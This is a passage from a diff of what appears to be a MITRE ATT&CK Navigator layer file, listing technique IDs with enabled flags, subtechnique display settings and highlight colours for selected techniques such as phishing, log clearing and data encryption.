"T1053.005" + }, + { + "enabled": false, + "techniqueID": "T1053.006" + }, + { + "enabled": false, + "techniqueID": "T1053.007" + }, + { + "enabled": false, + "techniqueID": "T1054" + }, + { + "enabled": false, + "techniqueID": "T1055" + }, + { + "enabled": false, + "techniqueID": "T1055.001" + }, + { + "enabled": false, + "techniqueID": "T1055.002" + }, + { + "enabled": false, + "techniqueID": "T1055.003" + }, + { + "enabled": false, + "techniqueID": "T1055.004" + }, + { + "enabled": false, + "techniqueID": "T1055.005" + }, + { + "enabled": false, + "techniqueID": "T1055.008" + }, + { + "enabled": false, + 
"techniqueID": "T1055.009" + }, + { + "enabled": false, + "techniqueID": "T1055.011" + }, + { + "enabled": false, + "techniqueID": "T1055.012" + }, + { + "enabled": false, + "techniqueID": "T1055.013" + }, + { + "enabled": false, + "techniqueID": "T1055.014" + }, + { + "enabled": false, + "techniqueID": "T1055.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1056" + }, + { + "color": "#7a34eb", + "techniqueID": "T1056.001" + }, + { + "enabled": false, + "techniqueID": "T1056.002" + }, + { + "enabled": false, + "techniqueID": "T1056.003" + }, + { + "enabled": false, + "techniqueID": "T1056.004" + }, + { + "enabled": false, + "techniqueID": "T1057" + }, + { + "enabled": false, + "techniqueID": "T1058" + }, + { + "enabled": false, + "techniqueID": "T1059" + }, + { + "enabled": false, + "techniqueID": "T1059.001" + }, + { + "enabled": false, + "techniqueID": "T1059.002" + }, + { + "enabled": false, + "techniqueID": "T1059.003" + }, + { + "enabled": false, + "techniqueID": "T1059.004" + }, + { + "enabled": false, + "techniqueID": "T1059.005" + }, + { + "enabled": false, + "techniqueID": "T1059.006" + }, + { + "enabled": false, + "techniqueID": "T1059.007" + }, + { + "enabled": false, + "techniqueID": "T1059.008" + }, + { + "enabled": false, + "techniqueID": "T1059.009" + }, + { + "enabled": false, + "techniqueID": "T1060" + }, + { + "enabled": false, + "techniqueID": "T1061" + }, + { + "enabled": false, + "techniqueID": "T1062" + }, + { + "enabled": false, + "techniqueID": "T1063" + }, + { + "enabled": false, + "techniqueID": "T1064" + }, + { + "enabled": false, + "techniqueID": "T1065" + }, + { + "enabled": false, + "techniqueID": "T1066" + }, + { + "enabled": false, + "techniqueID": "T1067" + }, + { + "enabled": false, + "techniqueID": "T1068" + }, + { + "enabled": false, + "techniqueID": "T1069" + }, + { + "enabled": false, + "techniqueID": "T1069.001" + }, + { + "enabled": false, + "techniqueID": "T1069.002" + }, + { + "enabled": false, + "techniqueID": 
"T1069.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1070" + }, + { + "color": "#7a34eb", + "techniqueID": "T1070.001" + }, + { + "enabled": false, + "techniqueID": "T1070.002" + }, + { + "enabled": false, + "techniqueID": "T1070.003" + }, + { + "enabled": false, + "techniqueID": "T1070.004" + }, + { + "enabled": false, + "techniqueID": "T1070.005" + }, + { + "enabled": false, + "techniqueID": "T1070.006" + }, + { + "enabled": false, + "techniqueID": "T1070.007" + }, + { + "enabled": false, + "techniqueID": "T1070.008" + }, + { + "enabled": false, + "techniqueID": "T1070.009" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "showSubtechniques": true, + "techniqueID": "T1071" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1071.001" + }, + { + "enabled": false, + "techniqueID": "T1071.002" + }, + { + "enabled": false, + "techniqueID": "T1071.003" + }, + { + "enabled": false, + "techniqueID": "T1071.004" + }, + { + "enabled": false, + "techniqueID": "T1072" + }, + { + "enabled": false, + "techniqueID": "T1073" + }, + { + "enabled": false, + "techniqueID": "T1074" + }, + { + "enabled": false, + "techniqueID": "T1074.001" + }, + { + "enabled": false, + "techniqueID": "T1074.002" + }, + { + "enabled": false, + "techniqueID": "T1075" + }, + { + "enabled": false, + "techniqueID": "T1076" + }, + { + "enabled": false, + "techniqueID": "T1077" + }, + { + "enabled": false, + "techniqueID": "T1078" + }, + { + "enabled": false, + "techniqueID": "T1078.001" + }, + { + "enabled": false, + "techniqueID": "T1078.002" + }, + { + "enabled": false, + "techniqueID": "T1078.003" + }, + { + "enabled": false, + "techniqueID": "T1078.004" + }, + { + "enabled": false, + "techniqueID": "T1079" + }, + { + "enabled": false, + "techniqueID": "T1080" + }, + { + "enabled": false, + "techniqueID": "T1081" + }, + { + "enabled": false, + 
"techniqueID": "T1082" + }, + { + "enabled": false, + "techniqueID": "T1083" + }, + { + "enabled": false, + "techniqueID": "T1084" + }, + { + "enabled": false, + "techniqueID": "T1085" + }, + { + "enabled": false, + "techniqueID": "T1086" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "showSubtechniques": true, + "techniqueID": "T1087" + }, + { + "enabled": false, + "techniqueID": "T1087.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1087.002" + }, + { + "enabled": false, + "techniqueID": "T1087.003" + }, + { + "enabled": false, + "techniqueID": "T1087.004" + }, + { + "enabled": false, + "techniqueID": "T1088" + }, + { + "enabled": false, + "techniqueID": "T1089" + }, + { + "enabled": false, + "techniqueID": "T1090" + }, + { + "enabled": false, + "techniqueID": "T1090.001" + }, + { + "enabled": false, + "techniqueID": "T1090.002" + }, + { + "enabled": false, + "techniqueID": "T1090.003" + }, + { + "enabled": false, + "techniqueID": "T1090.004" + }, + { + "enabled": false, + "techniqueID": "T1091" + }, + { + "enabled": false, + "techniqueID": "T1092" + }, + { + "enabled": false, + "techniqueID": "T1093" + }, + { + "enabled": false, + "techniqueID": "T1094" + }, + { + "enabled": false, + "techniqueID": "T1095" + }, + { + "enabled": false, + "techniqueID": "T1096" + }, + { + "enabled": false, + "techniqueID": "T1097" + }, + { + "showSubtechniques": true, + "techniqueID": "T1098" + }, + { + "enabled": false, + "techniqueID": "T1098.001" + }, + { + "enabled": false, + "techniqueID": "T1098.002" + }, + { + "enabled": false, + "techniqueID": "T1098.003" + }, + { + "enabled": false, + "techniqueID": "T1098.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1098.005" + }, + { + "enabled": false, + "techniqueID": "T1098.006" + }, + { + "enabled": false, + "techniqueID": "T1099" + }, + { + "enabled": false, + "techniqueID": "T1100" + }, + { + "enabled": false, + "techniqueID": 
"T1101" + }, + { + "enabled": false, + "techniqueID": "T1102" + }, + { + "enabled": false, + "techniqueID": "T1102.001" + }, + { + "enabled": false, + "techniqueID": "T1102.002" + }, + { + "enabled": false, + "techniqueID": "T1102.003" + }, + { + "enabled": false, + "techniqueID": "T1103" + }, + { + "enabled": false, + "techniqueID": "T1104" + }, + { + "color": "#7a34eb", + "techniqueID": "T1105" + }, + { + "enabled": false, + "techniqueID": "T1106" + }, + { + "enabled": false, + "techniqueID": "T1107" + }, + { + "enabled": false, + "techniqueID": "T1108" + }, + { + "enabled": false, + "techniqueID": "T1109" + }, + { + "showSubtechniques": true, + "techniqueID": "T1110" + }, + { + "color": "#7a34eb", + "techniqueID": "T1110.001" + }, + { + "enabled": false, + "techniqueID": "T1110.002" + }, + { + "enabled": false, + "techniqueID": "T1110.003" + }, + { + "enabled": false, + "techniqueID": "T1110.004" + }, + { + "enabled": false, + "techniqueID": "T1111" + }, + { + "color": "#7a34eb", + "techniqueID": "T1112" + }, + { + "color": "#7a34eb", + "techniqueID": "T1113" + }, + { + "enabled": false, + "techniqueID": "T1114" + }, + { + "enabled": false, + "techniqueID": "T1114.001" + }, + { + "enabled": false, + "techniqueID": "T1114.002" + }, + { + "enabled": false, + "techniqueID": "T1114.003" + }, + { + "enabled": false, + "techniqueID": "T1115" + }, + { + "enabled": false, + "techniqueID": "T1116" + }, + { + "enabled": false, + "techniqueID": "T1117" + }, + { + "enabled": false, + "techniqueID": "T1118" + }, + { + "enabled": false, + "techniqueID": "T1119" + }, + { + "enabled": false, + "techniqueID": "T1120" + }, + { + "enabled": false, + "techniqueID": "T1121" + }, + { + "enabled": false, + "techniqueID": "T1122" + }, + { + "enabled": false, + "techniqueID": "T1123" + }, + { + "enabled": false, + "techniqueID": "T1124" + }, + { + "enabled": false, + "techniqueID": "T1125" + }, + { + "enabled": false, + "techniqueID": "T1126" + }, + { + "enabled": false, + 
"techniqueID": "T1127" + }, + { + "enabled": false, + "techniqueID": "T1127.001" + }, + { + "enabled": false, + "techniqueID": "T1128" + }, + { + "enabled": false, + "techniqueID": "T1129" + }, + { + "enabled": false, + "techniqueID": "T1130" + }, + { + "enabled": false, + "techniqueID": "T1131" + }, + { + "enabled": false, + "techniqueID": "T1132" + }, + { + "enabled": false, + "techniqueID": "T1132.001" + }, + { + "enabled": false, + "techniqueID": "T1132.002" + }, + { + "enabled": false, + "techniqueID": "T1133" + }, + { + "enabled": false, + "techniqueID": "T1134" + }, + { + "enabled": false, + "techniqueID": "T1134.001" + }, + { + "enabled": false, + "techniqueID": "T1134.002" + }, + { + "enabled": false, + "techniqueID": "T1134.003" + }, + { + "enabled": false, + "techniqueID": "T1134.004" + }, + { + "enabled": false, + "techniqueID": "T1134.005" + }, + { + "enabled": false, + "techniqueID": "T1135" + }, + { + "enabled": false, + "techniqueID": "T1136" + }, + { + "enabled": false, + "techniqueID": "T1136.001" + }, + { + "enabled": false, + "techniqueID": "T1136.002" + }, + { + "enabled": false, + "techniqueID": "T1136.003" + }, + { + "enabled": false, + "techniqueID": "T1137" + }, + { + "enabled": false, + "techniqueID": "T1137.001" + }, + { + "enabled": false, + "techniqueID": "T1137.002" + }, + { + "enabled": false, + "techniqueID": "T1137.003" + }, + { + "enabled": false, + "techniqueID": "T1137.004" + }, + { + "enabled": false, + "techniqueID": "T1137.005" + }, + { + "enabled": false, + "techniqueID": "T1137.006" + }, + { + "enabled": false, + "techniqueID": "T1138" + }, + { + "enabled": false, + "techniqueID": "T1139" + }, + { + "enabled": false, + "techniqueID": "T1140" + }, + { + "enabled": false, + "techniqueID": "T1141" + }, + { + "enabled": false, + "techniqueID": "T1142" + }, + { + "enabled": false, + "techniqueID": "T1143" + }, + { + "enabled": false, + "techniqueID": "T1144" + }, + { + "enabled": false, + "techniqueID": "T1145" + }, + { + 
"enabled": false, + "techniqueID": "T1146" + }, + { + "enabled": false, + "techniqueID": "T1147" + }, + { + "enabled": false, + "techniqueID": "T1148" + }, + { + "enabled": false, + "techniqueID": "T1149" + }, + { + "enabled": false, + "techniqueID": "T1150" + }, + { + "enabled": false, + "techniqueID": "T1151" + }, + { + "enabled": false, + "techniqueID": "T1152" + }, + { + "enabled": false, + "techniqueID": "T1153" + }, + { + "enabled": false, + "techniqueID": "T1154" + }, + { + "enabled": false, + "techniqueID": "T1155" + }, + { + "enabled": false, + "techniqueID": "T1156" + }, + { + "enabled": false, + "techniqueID": "T1157" + }, + { + "enabled": false, + "techniqueID": "T1158" + }, + { + "enabled": false, + "techniqueID": "T1159" + }, + { + "enabled": false, + "techniqueID": "T1160" + }, + { + "enabled": false, + "techniqueID": "T1161" + }, + { + "enabled": false, + "techniqueID": "T1162" + }, + { + "enabled": false, + "techniqueID": "T1163" + }, + { + "enabled": false, + "techniqueID": "T1164" + }, + { + "enabled": false, + "techniqueID": "T1165" + }, + { + "enabled": false, + "techniqueID": "T1166" + }, + { + "enabled": false, + "techniqueID": "T1167" + }, + { + "enabled": false, + "techniqueID": "T1168" + }, + { + "enabled": false, + "techniqueID": "T1169" + }, + { + "enabled": false, + "techniqueID": "T1170" + }, + { + "enabled": false, + "techniqueID": "T1171" + }, + { + "enabled": false, + "techniqueID": "T1172" + }, + { + "enabled": false, + "techniqueID": "T1173" + }, + { + "enabled": false, + "techniqueID": "T1174" + }, + { + "enabled": false, + "techniqueID": "T1175" + }, + { + "enabled": false, + "techniqueID": "T1176" + }, + { + "enabled": false, + "techniqueID": "T1177" + }, + { + "enabled": false, + "techniqueID": "T1178" + }, + { + "enabled": false, + "techniqueID": "T1179" + }, + { + "enabled": false, + "techniqueID": "T1180" + }, + { + "enabled": false, + "techniqueID": "T1181" + }, + { + "enabled": false, + "techniqueID": "T1182" + }, + { + 
"enabled": false, + "techniqueID": "T1183" + }, + { + "enabled": false, + "techniqueID": "T1184" + }, + { + "enabled": false, + "techniqueID": "T1185" + }, + { + "enabled": false, + "techniqueID": "T1186" + }, + { + "enabled": false, + "techniqueID": "T1187" + }, + { + "enabled": false, + "techniqueID": "T1188" + }, + { + "enabled": false, + "techniqueID": "T1189" + }, + { + "enabled": false, + "techniqueID": "T1190" + }, + { + "enabled": false, + "techniqueID": "T1191" + }, + { + "enabled": false, + "techniqueID": "T1192" + }, + { + "enabled": false, + "techniqueID": "T1193" + }, + { + "enabled": false, + "techniqueID": "T1194" + }, + { + "enabled": false, + "techniqueID": "T1195" + }, + { + "enabled": false, + "techniqueID": "T1195.001" + }, + { + "enabled": false, + "techniqueID": "T1195.002" + }, + { + "enabled": false, + "techniqueID": "T1195.003" + }, + { + "enabled": false, + "techniqueID": "T1196" + }, + { + "enabled": false, + "techniqueID": "T1197" + }, + { + "enabled": false, + "techniqueID": "T1198" + }, + { + "enabled": false, + "techniqueID": "T1199" + }, + { + "enabled": false, + "techniqueID": "T1200" + }, + { + "enabled": false, + "techniqueID": "T1201" + }, + { + "enabled": false, + "techniqueID": "T1202" + }, + { + "enabled": false, + "techniqueID": "T1203" + }, + { + "enabled": false, + "techniqueID": "T1204" + }, + { + "enabled": false, + "techniqueID": "T1204.001" + }, + { + "enabled": false, + "techniqueID": "T1204.002" + }, + { + "enabled": false, + "techniqueID": "T1204.003" + }, + { + "enabled": false, + "techniqueID": "T1205" + }, + { + "enabled": false, + "techniqueID": "T1205.001" + }, + { + "enabled": false, + "techniqueID": "T1205.002" + }, + { + "enabled": false, + "techniqueID": "T1206" + }, + { + "enabled": false, + "techniqueID": "T1207" + }, + { + "enabled": false, + "techniqueID": "T1208" + }, + { + "enabled": false, + "techniqueID": "T1209" + }, + { + "enabled": false, + "techniqueID": "T1210" + }, + { + "enabled": false, + 
"techniqueID": "T1211" + }, + { + "enabled": false, + "techniqueID": "T1212" + }, + { + "enabled": false, + "techniqueID": "T1213" + }, + { + "enabled": false, + "techniqueID": "T1213.001" + }, + { + "enabled": false, + "techniqueID": "T1213.002" + }, + { + "enabled": false, + "techniqueID": "T1213.003" + }, + { + "enabled": false, + "techniqueID": "T1214" + }, + { + "enabled": false, + "techniqueID": "T1215" + }, + { + "enabled": false, + "techniqueID": "T1216" + }, + { + "enabled": false, + "techniqueID": "T1216.001" + }, + { + "enabled": false, + "techniqueID": "T1217" + }, + { + "showSubtechniques": true, + "techniqueID": "T1218" + }, + { + "enabled": false, + "techniqueID": "T1218.001" + }, + { + "enabled": false, + "techniqueID": "T1218.002" + }, + { + "enabled": false, + "techniqueID": "T1218.003" + }, + { + "enabled": false, + "techniqueID": "T1218.004" + }, + { + "enabled": false, + "techniqueID": "T1218.005" + }, + { + "enabled": false, + "techniqueID": "T1218.007" + }, + { + "enabled": false, + "techniqueID": "T1218.008" + }, + { + "enabled": false, + "techniqueID": "T1218.009" + }, + { + "enabled": false, + "techniqueID": "T1218.010" + }, + { + "color": "#7a34eb", + "techniqueID": "T1218.011" + }, + { + "enabled": false, + "techniqueID": "T1218.012" + }, + { + "enabled": false, + "techniqueID": "T1218.013" + }, + { + "enabled": false, + "techniqueID": "T1218.014" + }, + { + "color": "#7a34eb", + "techniqueID": "T1219" + }, + { + "enabled": false, + "techniqueID": "T1220" + }, + { + "color": "#7a34eb", + "techniqueID": "T1221" + }, + { + "enabled": false, + "techniqueID": "T1222" + }, + { + "enabled": false, + "techniqueID": "T1222.001" + }, + { + "enabled": false, + "techniqueID": "T1222.002" + }, + { + "enabled": false, + "techniqueID": "T1223" + }, + { + "enabled": false, + "techniqueID": "T1480" + }, + { + "enabled": false, + "techniqueID": "T1480.001" + }, + { + "enabled": false, + "techniqueID": "T1482" + }, + { + "enabled": false, + "techniqueID": 
"T1483" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "showSubtechniques": true, + "techniqueID": "T1484" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1484.002" + }, + { + "enabled": false, + "techniqueID": "T1485" + }, + { + "color": "#7a34eb", + "techniqueID": "T1486" + }, + { + "enabled": false, + "techniqueID": "T1487" + }, + { + "enabled": false, + "techniqueID": "T1488" + }, + { + "enabled": false, + "techniqueID": "T1489" + }, + { + "color": "#7a34eb", + "techniqueID": "T1490" + }, + { + "color": "#7a34eb", + "techniqueID": "T1490" + }, + { + "enabled": false, + "techniqueID": "T1491" + }, + { + "enabled": false, + "techniqueID": "T1491.001" + }, + { + "enabled": false, + "techniqueID": "T1491.002" + }, + { + "enabled": false, + "techniqueID": "T1492" + }, + { + "enabled": false, + "techniqueID": "T1493" + }, + { + "enabled": false, + "techniqueID": "T1494" + }, + { + "enabled": false, + "techniqueID": "T1495" + }, + { + "enabled": false, + "techniqueID": "T1496" + }, + { + "enabled": false, + "techniqueID": "T1497" + }, + { + "enabled": false, + "techniqueID": "T1497.001" + }, + { + "enabled": false, + "techniqueID": "T1497.002" + }, + { + "enabled": false, + "techniqueID": "T1497.003" + }, + { + "enabled": false, + "techniqueID": "T1498" + }, + { + "enabled": false, + "techniqueID": "T1498.001" + }, + { + "enabled": false, + "techniqueID": "T1498.002" + }, + { + "enabled": false, + "techniqueID": "T1499" + }, + { + "enabled": false, + "techniqueID": "T1499.001" + }, + { + "enabled": false, + "techniqueID": "T1499.002" + }, + { + "enabled": false, + "techniqueID": "T1499.003" + }, + { + "enabled": false, + "techniqueID": "T1499.004" + }, + { + "enabled": false, + "techniqueID": "T1500" + }, + { + "enabled": false, + "techniqueID": "T1501" + }, + { + "enabled": false, + "techniqueID": "T1502" + }, + { + 
"enabled": false, + "techniqueID": "T1503" + }, + { + "enabled": false, + "techniqueID": "T1504" + }, + { + "enabled": false, + "techniqueID": "T1505" + }, + { + "enabled": false, + "techniqueID": "T1505.001" + }, + { + "enabled": false, + "techniqueID": "T1505.002" + }, + { + "enabled": false, + "techniqueID": "T1505.003" + }, + { + "enabled": false, + "techniqueID": "T1505.004" + }, + { + "enabled": false, + "techniqueID": "T1505.005" + }, + { + "enabled": false, + "techniqueID": "T1506" + }, + { + "enabled": false, + "techniqueID": "T1514" + }, + { + "enabled": false, + "techniqueID": "T1518" + }, + { + "enabled": false, + "techniqueID": "T1518.001" + }, + { + "enabled": false, + "techniqueID": "T1519" + }, + { + "enabled": false, + "techniqueID": "T1522" + }, + { + "enabled": false, + "techniqueID": "T1525" + }, + { + "enabled": false, + "techniqueID": "T1526" + }, + { + "enabled": false, + "techniqueID": "T1527" + }, + { + "enabled": false, + "techniqueID": "T1528" + }, + { + "enabled": false, + "techniqueID": "T1529" + }, + { + "enabled": false, + "techniqueID": "T1530" + }, + { + "enabled": false, + "techniqueID": "T1531" + }, + { + "enabled": false, + "techniqueID": "T1534" + }, + { + "enabled": false, + "techniqueID": "T1535" + }, + { + "enabled": false, + "techniqueID": "T1536" + }, + { + "enabled": false, + "techniqueID": "T1537" + }, + { + "enabled": false, + "techniqueID": "T1538" + }, + { + "enabled": false, + "techniqueID": "T1539" + }, + { + "enabled": false, + "techniqueID": "T1542" + }, + { + "enabled": false, + "techniqueID": "T1542.001" + }, + { + "enabled": false, + "techniqueID": "T1542.002" + }, + { + "enabled": false, + "techniqueID": "T1542.003" + }, + { + "enabled": false, + "techniqueID": "T1542.004" + }, + { + "enabled": false, + "techniqueID": "T1542.005" + }, + { + "showSubtechniques": true, + "techniqueID": "T1543" + }, + { + "enabled": false, + "techniqueID": "T1543.001" + }, + { + "enabled": false, + "techniqueID": "T1543.002" + }, 
+ { + "color": "#7a34eb", + "techniqueID": "T1543.003" + }, + { + "enabled": false, + "techniqueID": "T1543.004" + }, + { + "enabled": false, + "techniqueID": "T1546" + }, + { + "enabled": false, + "techniqueID": "T1546.001" + }, + { + "enabled": false, + "techniqueID": "T1546.002" + }, + { + "enabled": false, + "techniqueID": "T1546.003" + }, + { + "enabled": false, + "techniqueID": "T1546.004" + }, + { + "enabled": false, + "techniqueID": "T1546.005" + }, + { + "enabled": false, + "techniqueID": "T1546.006" + }, + { + "enabled": false, + "techniqueID": "T1546.007" + }, + { + "enabled": false, + "techniqueID": "T1546.008" + }, + { + "enabled": false, + "techniqueID": "T1546.009" + }, + { + "enabled": false, + "techniqueID": "T1546.010" + }, + { + "enabled": false, + "techniqueID": "T1546.011" + }, + { + "enabled": false, + "techniqueID": "T1546.012" + }, + { + "enabled": false, + "techniqueID": "T1546.013" + }, + { + "enabled": false, + "techniqueID": "T1546.014" + }, + { + "enabled": false, + "techniqueID": "T1546.015" + }, + { + "enabled": false, + "techniqueID": "T1546.016" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "showSubtechniques": true, + "techniqueID": "T1547" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.001" + }, + { + "enabled": false, + "techniqueID": "T1547.002" + }, + { + "enabled": false, + "techniqueID": "T1547.003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.004" + }, + { + "color": "#7a34eb", + "techniqueID": "T1547.005" + }, + { + "enabled": false, + "techniqueID": "T1547.006" + }, + { + "enabled": false, + "techniqueID": "T1547.007" + }, + { + "enabled": false, + "techniqueID": "T1547.008" + }, + { + "enabled": false, + "techniqueID": "T1547.009" + }, + { + "enabled": false, + "techniqueID": "T1547.010" + }, + { + "enabled": false, + "techniqueID": "T1547.011" + }, + { + "enabled": false, + "techniqueID": "T1547.012" + }, + { + 
"enabled": false, + "techniqueID": "T1547.013" + }, + { + "enabled": false, + "techniqueID": "T1547.014" + }, + { + "enabled": false, + "techniqueID": "T1547.015" + }, + { + "showSubtechniques": true, + "techniqueID": "T1548" + }, + { + "enabled": false, + "techniqueID": "T1548.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1548.002" + }, + { + "enabled": false, + "techniqueID": "T1548.003" + }, + { + "enabled": false, + "techniqueID": "T1548.004" + }, + { + "enabled": false, + "techniqueID": "T1548.005" + }, + { + "enabled": false, + "techniqueID": "T1550" + }, + { + "enabled": false, + "techniqueID": "T1550.001" + }, + { + "enabled": false, + "techniqueID": "T1550.002" + }, + { + "enabled": false, + "techniqueID": "T1550.003" + }, + { + "enabled": false, + "techniqueID": "T1550.004" + }, + { + "enabled": false, + "techniqueID": "T1552" + }, + { + "enabled": false, + "techniqueID": "T1552.001" + }, + { + "enabled": false, + "techniqueID": "T1552.002" + }, + { + "enabled": false, + "techniqueID": "T1552.003" + }, + { + "enabled": false, + "techniqueID": "T1552.004" + }, + { + "enabled": false, + "techniqueID": "T1552.005" + }, + { + "enabled": false, + "techniqueID": "T1552.006" + }, + { + "enabled": false, + "techniqueID": "T1552.007" + }, + { + "enabled": false, + "techniqueID": "T1552.008" + }, + { + "enabled": false, + "techniqueID": "T1553" + }, + { + "enabled": false, + "techniqueID": "T1553.001" + }, + { + "enabled": false, + "techniqueID": "T1553.002" + }, + { + "enabled": false, + "techniqueID": "T1553.003" + }, + { + "enabled": false, + "techniqueID": "T1553.004" + }, + { + "enabled": false, + "techniqueID": "T1553.005" + }, + { + "enabled": false, + "techniqueID": "T1553.006" + }, + { + "enabled": false, + "techniqueID": "T1554" + }, + { + "showSubtechniques": true, + "techniqueID": "T1555" + }, + { + "enabled": false, + "techniqueID": "T1555.001" + }, + { + "enabled": false, + "techniqueID": "T1555.002" + }, + { + "color": "#7a34eb", + 
"techniqueID": "T1555.003" + }, + { + "enabled": false, + "techniqueID": "T1555.004" + }, + { + "enabled": false, + "techniqueID": "T1555.005" + }, + { + "enabled": false, + "techniqueID": "T1555.006" + }, + { + "enabled": false, + "techniqueID": "T1556" + }, + { + "enabled": false, + "techniqueID": "T1556.001" + }, + { + "enabled": false, + "techniqueID": "T1556.002" + }, + { + "enabled": false, + "techniqueID": "T1556.003" + }, + { + "enabled": false, + "techniqueID": "T1556.004" + }, + { + "enabled": false, + "techniqueID": "T1556.005" + }, + { + "enabled": false, + "techniqueID": "T1556.006" + }, + { + "enabled": false, + "techniqueID": "T1556.007" + }, + { + "enabled": false, + "techniqueID": "T1556.008" + }, + { + "enabled": false, + "techniqueID": "T1557" + }, + { + "enabled": false, + "techniqueID": "T1557.001" + }, + { + "enabled": false, + "techniqueID": "T1557.002" + }, + { + "enabled": false, + "techniqueID": "T1557.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1558" + }, + { + "enabled": false, + "techniqueID": "T1558.001" + }, + { + "enabled": false, + "techniqueID": "T1558.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1558.003" + }, + { + "enabled": false, + "techniqueID": "T1558.004" + }, + { + "enabled": false, + "techniqueID": "T1559" + }, + { + "enabled": false, + "techniqueID": "T1559.001" + }, + { + "enabled": false, + "techniqueID": "T1559.002" + }, + { + "enabled": false, + "techniqueID": "T1559.003" + }, + { + "enabled": false, + "techniqueID": "T1560" + }, + { + "enabled": false, + "techniqueID": "T1560.001" + }, + { + "enabled": false, + "techniqueID": "T1560.002" + }, + { + "enabled": false, + "techniqueID": "T1560.003" + }, + { + "enabled": false, + "techniqueID": "T1561" + }, + { + "enabled": false, + "techniqueID": "T1561.001" + }, + { + "enabled": false, + "techniqueID": "T1561.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1562" + }, + { + "color": "#7a34eb", + "techniqueID": "T1562.001" + }, + 
{ + "enabled": false, + "techniqueID": "T1562.002" + }, + { + "enabled": false, + "techniqueID": "T1562.003" + }, + { + "enabled": false, + "techniqueID": "T1562.004" + }, + { + "enabled": false, + "techniqueID": "T1562.006" + }, + { + "enabled": false, + "techniqueID": "T1562.007" + }, + { + "enabled": false, + "techniqueID": "T1562.008" + }, + { + "enabled": false, + "techniqueID": "T1562.009" + }, + { + "enabled": false, + "techniqueID": "T1562.010" + }, + { + "enabled": false, + "techniqueID": "T1562.011" + }, + { + "enabled": false, + "techniqueID": "T1562.012" + }, + { + "enabled": false, + "techniqueID": "T1563" + }, + { + "enabled": false, + "techniqueID": "T1563.001" + }, + { + "enabled": false, + "techniqueID": "T1563.002" + }, + { + "enabled": false, + "techniqueID": "T1564" + }, + { + "enabled": false, + "techniqueID": "T1564.001" + }, + { + "enabled": false, + "techniqueID": "T1564.002" + }, + { + "enabled": false, + "techniqueID": "T1564.003" + }, + { + "enabled": false, + "techniqueID": "T1564.004" + }, + { + "enabled": false, + "techniqueID": "T1564.005" + }, + { + "enabled": false, + "techniqueID": "T1564.006" + }, + { + "enabled": false, + "techniqueID": "T1564.007" + }, + { + "enabled": false, + "techniqueID": "T1564.008" + }, + { + "enabled": false, + "techniqueID": "T1564.009" + }, + { + "enabled": false, + "techniqueID": "T1564.010" + }, + { + "enabled": false, + "techniqueID": "T1564.011" + }, + { + "enabled": false, + "techniqueID": "T1565" + }, + { + "enabled": false, + "techniqueID": "T1565.001" + }, + { + "enabled": false, + "techniqueID": "T1565.002" + }, + { + "enabled": false, + "techniqueID": "T1565.003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "showSubtechniques": true, + "techniqueID": "T1566" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1566.001" + }, + { + "color": 
"#7a34eb", + "techniqueID": "T1566.002" + }, + { + "enabled": false, + "techniqueID": "T1566.003" + }, + { + "enabled": false, + "techniqueID": "T1566.004" + }, + { + "showSubtechniques": true, + "techniqueID": "T1567" + }, + { + "enabled": false, + "techniqueID": "T1567.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1567.002" + }, + { + "enabled": false, + "techniqueID": "T1567.003" + }, + { + "enabled": false, + "techniqueID": "T1567.004" + }, + { + "enabled": false, + "techniqueID": "T1568" + }, + { + "enabled": false, + "techniqueID": "T1568.001" + }, + { + "enabled": false, + "techniqueID": "T1568.002" + }, + { + "enabled": false, + "techniqueID": "T1568.003" + }, + { + "enabled": false, + "techniqueID": "T1569" + }, + { + "enabled": false, + "techniqueID": "T1569.001" + }, + { + "enabled": false, + "techniqueID": "T1569.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1570" + }, + { + "enabled": false, + "techniqueID": "T1571" + }, + { + "enabled": false, + "techniqueID": "T1572" + }, + { + "enabled": false, + "techniqueID": "T1573" + }, + { + "enabled": false, + "techniqueID": "T1573.001" + }, + { + "enabled": false, + "techniqueID": "T1573.002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1574" + }, + { + "enabled": false, + "techniqueID": "T1574.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1574.002" + }, + { + "enabled": false, + "techniqueID": "T1574.004" + }, + { + "enabled": false, + "techniqueID": "T1574.005" + }, + { + "enabled": false, + "techniqueID": "T1574.006" + }, + { + "enabled": false, + "techniqueID": "T1574.007" + }, + { + "enabled": false, + "techniqueID": "T1574.008" + }, + { + "enabled": false, + "techniqueID": "T1574.009" + }, + { + "enabled": false, + "techniqueID": "T1574.010" + }, + { + "enabled": false, + "techniqueID": "T1574.011" + }, + { + "enabled": false, + "techniqueID": "T1574.012" + }, + { + "enabled": false, + "techniqueID": "T1574.013" + }, + { + "enabled": false, + "techniqueID": "T1578" 
